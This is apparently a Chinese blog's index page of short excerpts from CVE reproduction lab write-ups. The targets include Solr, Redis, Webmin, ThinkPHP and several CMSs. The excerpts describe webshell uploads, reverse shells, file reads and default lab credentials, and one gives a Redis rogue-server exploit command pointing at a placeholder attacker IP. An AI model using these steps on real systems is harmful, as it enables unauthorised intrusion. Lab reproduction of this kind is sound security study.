- 博客(153)
- 收藏
- 关注
RSS订阅原创 Apache Solr Velocity注入远程命令执行(CVE-2019-17558)
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问solr服务器,发送特定的数据包开启params.resource.loader.enabled,然后通过get请求访问接口导致服务器命令执行。2.默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。我们先通过如下API获取所有的核心。3.通过如下请求开启params.resource.loader.enabled,其中API路径包含刚才获取的core名称。
2024-02-27 11:30:59
510
原创 SaltStack命令执行(CVE-2020-16846)
CVE-2020-16846和CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令。CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。salt-api虽不是默认开启配置,但绝大多数SaltStack用户会选择开启salt-api,故存在较高风险。SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,主要功能有配置管理系统,能够将远程节点维护在一个预定义的状态;4.进入容器查看文件成功创建。
2024-02-27 10:21:19
428
原创 django SQL注入(CVE-2019-14234)
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。在1.11.x before 1.11.23、2.1.x before 2.1.11和2.2.x before 2.2.4的版本中,Django存在安全漏洞,Django中使用了JSONField并且查询的“键名”可控,导致存在SQL注入漏洞。
2024-02-26 18:00:04
610
原创 phpmyadmin SQL注入(CVE-2020-5504)
当Phpmyadmin <= 5.00和Phpmyadmin <= 4.94时,在用户帐户页面中存在一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。5.查看 SELECT load_file('/var/www/html/pma/index.php')所以网站绝对路径为/var/www/html/pma。1.访问http://ip:port,出现如下页面,开始实验。
2024-02-26 17:23:56
688
原创 Nostromo远程命令执行(CVE-2019-16278)
在nhttpd <= 1.9.6版本中,Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。1.访问http://ip:port,出现如下页面,开始实验。3.将数据包发送给重发器,并修改get请求。2.通过burp进行抓包。
2024-02-26 16:41:16
465
原创 Maccms命令执行(CVE-2017-17733)
远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。2.通过火狐浏览器访问http://ip:port/index.php?Maccms是一套跨平台的基于PHP和MySQL快速建站系统。1.访问http://ip:port,出现如下页面,开始实验。url地址:http://ip:port/c.php。Maccms 8.x版本中存在。3.蚁剑连接,getshell。
2024-02-26 16:18:27
443
原创 DedeCMS文件上传(CVE-2019-8933)
index.php利用该漏洞向uploads/目录上传.php文件并执行该文件。后台路径:/uploads/dede/ 后台密码:admin:admin。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。5.点击生成->更新主页HTML,选择主页模板为default/newtpl.htm,主页位置修改为php文件,首页模式选择静态,最后点击更新主页HTML。2.访问http://ip:port/uploads/dede,1.访问http://ip:port,出现如下页面,开始实验。
2024-02-21 16:20:12
474
原创 JunAMS文件上传(CNVD-2020-24741)
JunAMS junAMS 1.2.1.20190403版本存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。2.访问http://ip:port/admin.php,进入后台登录页面。后台路径 /admin.php 账号密码 admin:admin。3.输入账号密码进行登录,若显示系统正在处理中,点击F5刷新页面。JunAMS是一款以ThinkPHP为框架的开源内容管理系统。1.访问http://ip:port,出现如下页面,开始实验。4.通过burp发送如下poload。
2024-02-21 15:44:45
1075
2
原创 Webmin远程代码执行(CVE-2019-15642)
Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。账户密码:root/root。3.通过burp随便抓取一个页面的包,并修改请求内容,执行id命令。1.访问https://ip:port,出现如下页面,开始实验。5.构造反弹shell命令,并对其进行url编码。Webmin是一套基于Web的用于类。2.输入账号密码,进行登录。
2024-02-21 15:39:16
317
原创 SeaCMS远程命令执行(CNVD-2020-22721)
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
2024-02-21 14:08:38
489
原创 帝国CMS代码注入(CVE-2018-19462)
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。1.访问http://ip:port,出现如下页面,开始实验。4.点击系统,备份与恢复数据,执行SQL语句。5.输入以下poyload,并执行SQL语句。2.访问管理员登录界面。3.使用账号密码登录。
2024-02-21 13:50:34
338
原创 ThinkCMF代码执行 (CVE-2019-7580)
ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. ThinkCMF 5.0.19这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发代码执行漏洞。2.访问http://ip:port/admin,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.分类名称和描述随便填,分类别名输入poc,并点击添加。4.门户管理->分类管理->添加分类。6.勾选添加的分类,并点击显示。3.输入账号密码进行登录。
2024-02-21 11:04:39
504
1
原创 Apache Zeppelin命令执行(cnvd_2019_33156)
Apache Zeppelin是一款基于Web的NoteBook,支持交互式数据分析。Zeppelin可以使用丰富的预构建语言后端(或解释器)制作精美的数据驱动,交互式和协作文档。Apache Zeppelin存在未授权的用户访问命令执行接口,导致了任意用户都可以执行恶意命令获取服务器权限。2.点击Create New Note,执行Linux反弹,选择sh,并创建note。1.访问http://ip:port,出现如下页面,开始实验。4.执行反弹命令,并点击运行。5.监听成功,执行id命令。
2024-02-21 10:35:15
418
原创 Typesetter CMS文件上传(CVE-2020-25790)
Typesetter是一款轻量级的CMS,它以其无需数据库的特性和易用的内容编辑功能著称。虽然Typesetter的插件和主题数量不及WordPress,但对于追求简洁和速度的小型网站来说,它是一个不错的选择。Typesetter的用户界面直观,使得内容管理变得非常简单。在Typesetter CMS Typesetter CMS 5.*,<=5.1的版本中,存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。7.点击打开提取的php文件,获取文件路径。
2024-02-21 10:12:38
348
原创 Joomla远程代码执行(CVE-2021-23132)
后台路径:/administrator 超级管理员:superadmin:123456 普通管理员:admin:123456。显示成功登录超级管理员账号后,创建了普通管理员,并更改了默认路径,实现了目录遍历这一步,之后删除了config.xml文件,又成功上传了新的config.xml文件,并赋予hk用户超级管理员权限。),添加完成后,点击上面的Save 保存页面。13.访问error.php文件,可看到空白页面,证明漏洞复现成功了。1.访问http://ip:port,出现如下页面,开始实验。
2024-02-20 11:46:21
756
原创 EmpireCMS文件上传(CVE-2018-18086)
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。6.上传该文件(数据表名随意填写,我这里填写的是php),点击马上导入。1.访问http://ip:port,出现如下页面,开始实验。4.点击系统,数据表与系统模型,管理数据表,导入系统模型。7.访问上传的getshell文件。2.访问管理员登录界面。
2024-02-20 10:28:18
441
原创 Node.Js命令执行(CVE-2021-21315)
Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在Systeminformation < 5.3.1的版本中,存在命令执行漏洞,攻击者可以通过未过滤的参数中注入payload执行系统命令。6.尝试发送这样的请求:http://ip:port/api/getServices?
2024-02-20 09:46:05
502
原创 Nexus2 yum插件命令执行(CVE-2019-5475)
Nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。Sonatype Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。
2024-02-18 17:18:46
393
原创 XStream命令执行(CVE-2021-29505)
XStream在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16及之前版本黑名单存在缺陷。攻击者可以操纵已处理的输入流并替换或注入对象,从而在。XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。3.使用ysoserial并选择一个端口进行攻击(此处选择了1099)1.访问http://ip:port,出现如下页面,开始实验。2.对反弹shell进行base64编码。Host: 目标ip:port。
2024-02-18 15:37:22
817
原创 GetSimple CMS远程命令执行(CVE-2019-11231)
6.访问后台管理系统http://ip:port/admin/index.php,修改模板文件,执行phpinfo函数,获取系统信息。7.访问phpinfo页面,查看执行效果,http://ip:port/theme/Innovation/template.php。3.访问http://ip:port/data/users/admin.xml,获取admin.xml中记录的用户相关信息。5.访问后台地址http://ip:port/admin/index.php,填写正确的用户名密码登录后台。
2024-02-18 15:07:34
407
原创 Redis远程代码执行(cnvd-2019-21763)
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp.so -c "id"Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。3.返回上一级目录,利用exp工具,执行id命令。1.下载exp利用工具。
2024-02-18 11:37:30
221
原创 Nexus 3越权漏洞(CVE-2020-11444)
在Nexus Repository Manager 3.x OSS / Pro <= 3.21.1Nexus 3的版本中,存在任意修改admin密码越权漏洞,攻击者可以用低权限用户登录获取sessionID越权进行修改admin用户的密码。Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。3.F12,打开开发者模式,在应用程序中查找NXSESSIONID。1.访问http://ip:port,出现如下页面,开始实验。2.点击登录,输入默认账号密码进行登录。
2024-02-18 11:07:34
777
原创 ActiveMQ 信息泄漏(CVE-2017-15709)
Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。Apache ActiveMQ默认消息队列61616端口对外,61616端口使用了OpenWire协议,这个端口会暴露服务器相关信息,这些相关信息实际上是debug信息。会返回应用名称,JVM,操作系统以及内核版本等信息。1.访问目标ip和port获取泄露的信息。
2024-02-06 13:28:20
659
1
原创 ActiveMQ任意文件写入(CVE-2016-3088)
ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);3.通过burp抓取http://ip:port页面的包,并修改get请求,通过put请求上传jsp马,文件不能以jsp命名,否则会上传失败。4.访问http://ip:port/fileserver/1.jsp,文件写入但是没有被执行。5.利用MOVE,将木马文件移动到api或者admin,我这边是移动到了api目录下。6.访问移动的jsp文件,并执行id命令。
2024-02-02 15:52:53
502
原创 phpok文件上传(CVE-2018-12491)
2.访问后台http://ip:port/admin.php,输入账号密码登录。PHPOK存在后台文件上传漏洞,攻击者可利用该漏洞获取网站服务器控制权。后台路径:/admin.php 用户名密码:admin:123456。1.访问http://ip:port,出现如下页面,开始实验。10.点击预览,可以看到文件上传位置和上传后的文件名。9.选择压缩软件,并上传php一句话木马。3.功能菜单->工具->附件分类管理。5.添加,php支持附件类型,并提交。11.填写主题和内容后,点击提交。
2024-02-02 14:29:30
362
原创 Gitlab SSRF(CVE-2021-22214)
当13.10.5 > GitLab >= 10.5、13.11.5 > GitLab >= 13.11、13.12.2 > GitLab >= 13.12时,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。而根据其说明文档文档,其include操作支持remote选项,用于获取远端的yaml。GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
2024-02-02 13:36:24
358
原创 Dedecms代码执行(cnvd-2018-01221)
织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。2.访问http://ip:port/dede/login.php,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.蚁剑连接,getshell。1.禁止此处写入文件。4.访问上传文件路径。
2024-02-02 09:56:39
300
原创 Lanproxy任意文件读取(CVE-2021-3019)
Lanproxy 0.1存在路径遍历漏洞,该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。Lanproxy是ffay个人开发者的一个可将局域网内服务代理到公网的内网穿透工具。2.通过burp抓包,修改get请求,读取/etc/passwd。1.访问http://ip:port,出现如下页面,开始实验。
2024-01-31 16:39:22
300
原创 imcat远程代码执行(CNVD-2020-32339)
贴心猫(imcat)是一款PHP+MySQL架构设计的通用网站系统,简约、轻量、实用、共享,永久开源免费。2.访问http://ip:port/root/run/adm.php ,进入后台登录页面,并输入账号密码进行登录。3.在工具中找到DIY配置-搜索,选择入口配置,修改dev.php内容为php一句话木马。1.访问http://ip:port,出现如下页面,开始实验。4.保存后,通过蚁剑连接,getshell。密码:pass_vulfocus。账号:adm_vulfocus。1.关闭后台修改源码功能。
2024-01-31 16:28:36
351
原创 UCMS文件上传(CVE-2020-25483)
可以非常方便的通过它来快速开发各种企业站、文章站、站群系统。系统兼容PHP5.2--PHP8.0,在APACHE、NGINX、IIS上都能使用,支持MySQL SQLite两种数据库。后台简洁高效,上手容易,结构清晰,管理维护方便。,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。1.访问http://ip:port/ucms/login.php,进入登陆页面。6.访问http://ip:port,查看页面phpinfo信息。
2024-01-31 15:39:08
437
1
原创 Webmin命令执行(CVE-2020-35606)
Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。账户密码:root:password。使用前注意修改py文件中的121行的目标端口号和122行的监听端口号。://ip:port,出现如下页面,开始实验。3.下载exp,并修改文件内容。
2024-01-31 10:53:51
477
原创 Yapi接口管理平台RCE漏洞
的、可视化的接口管理平台。若YApi对外开放注册功能,攻击者可在注册并登录后,通过构造特殊的请求执行任意代码,接管服务器。3、安全组只开放Nginx端口,你可以在Nginx限制IP白名单。5.点击高级Mock,选择脚本,添加代码,选择开启,并进行保存。1.访问http://ip:port,出现如下页面,开始实验。2、使用Nginx对Yapi进行反向代理。YApi是一个可本地部署的、打通前后端及。5、关闭Yapi Mock。1、更改Yapi运行端口。密码:ymfe.org。4、关闭Yapi注册。
2024-01-31 10:09:32
434
原创 Spring Boot远程代码执行
漏洞描述:Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化Spring应用的创建、运行、调试、部署等。使用Spring Boot可以做到专注于Spring应用的开发,而无需过多关注XML的配置。Spring Boot使用“习惯优于配置”的理念,简单来说,它提供了一堆依赖打包,并已经按照使用习惯解决了依赖问题。使用Spring Boot可以不用或者只需要很少的Spring配置就可以让企业项目快速运行起来。Spring Boot 1.1.0-1.1.12、1.2.0-1.
2024-01-30 17:26:03
701
原创 Apache Flink任意文件读取(CVE-2020-17519)
Apache Flink 功能强大,支持开发和运行多种不同种类的应用程序。它的主要特性包括:批流一体化、精密的状态管理、事件时间支持以及精确一次的状态一致性保障等。Flink不仅可以运行在包括YARN、Mesos、Kubernetes在内的多种资源管理框架上,还支持在裸机集群上独立部署。事实证明,Flink已经可以扩展到数千核心,其状态可以达到TB级别,且仍能保持高吞吐、低延迟的特性。Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。
2024-01-29 14:51:25
256
原创 ThinkPHP 3.2.x RCE漏洞
ThinkPHP是一个开源免费的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。Thinkphp在国内拥有庞大的用户群体,其中不乏关键基础设施用户。ThinkPHP 3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。1.访问http://ip:port,出现如下页面,开始实验。2.通过burp抓包,修改get请求,创建log文件。
2024-01-29 11:12:11
454
原创 Apache OFBiz xmlrpc XXE漏洞(CVE-2018-8033)
16.11.01到16.11.04中,OFBiz HTTP引擎(org.apache.ofbiz.service.engine.HttpEngine.java)通过/ webtools / control / httpService端点处理对HTTP服务的请求。Apache OFBiz 是一个用 Java 编写的企业资源规划 (ERP) 系统,它是一个开放源代码、可扩展的企业级应用程序。它包含大量的库、实体、服务和功能,覆盖了企业运营的各个方面,如销售、采购、库存、财务、人力资源等。
2024-01-29 10:27:02
458
原创 Webmin-CSRF(CVE-2021-31760)
3.如果使用setup.pl脚本进行安装,则可以通过将行referers_none=1添加到/etc/webmin/config中来修复这个此漏洞。2.使用标准的RPM、Deb、TAR和Solaris软件包安装,因为它们不使用setup.pl脚本安装webmin,因此不容易受到攻击。6.在不关闭浏览器并且不退出当前登陆的情况下,点击访问CSRF_POC.html,跳转至登录页面,输入账号密码登录。5.进入CVE-2021-31760-main脚本文件夹,可以看到生成了CSRF_POC.html文件。
2024-01-26 10:51:51
483
原创 OKLite文件上传 (CVE-2019-16131)
锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。2.访问http://ip:port/admin.php?1.访问http://ip:port,出现如下页面,开始实验。4.模块管理-模块导入,导入1.zip,包含1.php。3.输入账号密码进行登录。
2024-01-24 10:09:43
507
原创 dcrcms文件上传(cnvd-2020-27175)
稻草人企业站是一款基于PHP+Sqlite/MySQL的开源简单小巧的免费企业网站系统。2.访问http://ip:port/dcr/login.htm,进入登录页面。稻草人企业站1.1.5存在文件上传漏洞,攻击者可利用漏洞获取服务器控制权。1.访问http://ip:port,出现如下页面,开始实验。5.回到后台首页----->添加新闻。7.点击添加新闻,并通过burp抓包。8.在重发器中,修改文件类型,并发包。10.蚁剑连接,getshell。密 码: 123456。4.填写分类名并添加分类。
2024-01-24 09:50:40
669
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人